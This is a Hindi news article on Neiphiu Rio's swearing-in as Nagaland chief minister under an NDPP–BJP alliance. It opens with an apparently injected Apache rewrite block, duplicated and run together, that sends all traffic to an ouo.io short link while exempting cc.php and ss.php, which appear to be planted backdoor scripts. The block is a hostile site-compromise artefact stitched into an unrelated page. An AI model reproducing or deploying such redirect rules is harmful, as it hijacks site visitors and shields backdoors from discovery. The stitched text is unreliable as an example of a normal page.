
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 379
Previous Nextनई दिल्ली। नेफ्यू रियो नागालैंड के नए मुख्यमंत्री बन गए हैं। नेफ्यू को राज्यपाल पीबी आचार्य ने प्रदेश के मुख्यमंत्री पद की शपथ दिलाई। आपको बता दें कि नागालैंड में एनडीपीपी ने बीजेपी के समर्थन से सरकार बनाई है। यह शपथ ग्रहण समारोह कोहिमा लोकल ग्राउंड में आयोजित किया गया। इस दौरान सीएम नेफ्यू रियो के साथ 10 विधायकों ने मंत्री पद की शपथ ली। इस शपथ ग्रहण समारोह में भारतीय जनता पार्टी के अध्यक्ष अमित शाह, रक्षामंत्री निर्मला सीतारमण, केंद्रीय मंत्री किरण रिजिजू भी मौजूद रहे। ऐसा पहली बार हुआ है कि नगालैंड में किसी सरकार ने खुले मैदान में शपथ ली हो। सीएम रियो को 16 मार्च तक या इससे पहले सदन में बहुमत साबित करने होगा। रियो के पास भाजपा के 12 विधायकों के, एक जदयू और एक निर्दलीय विधायक का समर्थन हासिल है। साथ में एनडीपीपी के 18 विधायक हैं। इससे पहले केंद्रीय मंत्री जगत प्रकाश नड्डा ने भाजपा के महासचिव अरूण सिंह और भाजपा के प्रदेश अध्यक्ष विसासोली लहोनगु के साथ राज्यपाल से मिलकर रियो का समर्थन करने वाला एक पत्र दिया था, जिस पर भाजपा के 12 विधायकों के हस्ताक्षर थे। भाजपा नेताओं ने राज्यपाल को सूचित किया कि वाई पट्टन को विधानसभा में भाजपा के विधायक दल का नेता चुना गया है।
नेशनल पीपल्स पार्टी( एनपीपी) के प्रदेश अध्यक्ष एटो येथोमी ने कहा कि उन्होंने रियो को समर्थन देने वाला एक पत्र राज्यपाल को सौंपा है। हाल में खत्म हुए विधानसभा चुनाव में सत्तारूढ़ एनपीएफ ने 26 सीटें जीती हैं। एनडीपीपी- भाजपा के गठबंधन ने 30 सीटें अपनी झोली में डाली हैं और उन्हें एनपीपी के दो विधायकों तथा एक जदयू और एक निर्दलीय का समर्थन हासिल है।